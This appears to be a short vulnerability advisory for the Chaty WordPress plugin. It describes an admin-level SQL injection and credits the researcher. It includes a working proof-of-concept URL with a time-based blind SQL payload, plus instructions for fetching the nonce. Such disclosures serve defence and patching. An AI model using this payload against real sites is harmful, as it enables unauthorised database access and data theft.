The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B--+- To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads
Nguyen Duy Quoc Khanh
Nguyen Duy Quoc Khanh
Yes
2022-11-14 (about 6 months ago)
2022-11-14 (about 6 months ago)
2022-11-14 (about 6 months ago)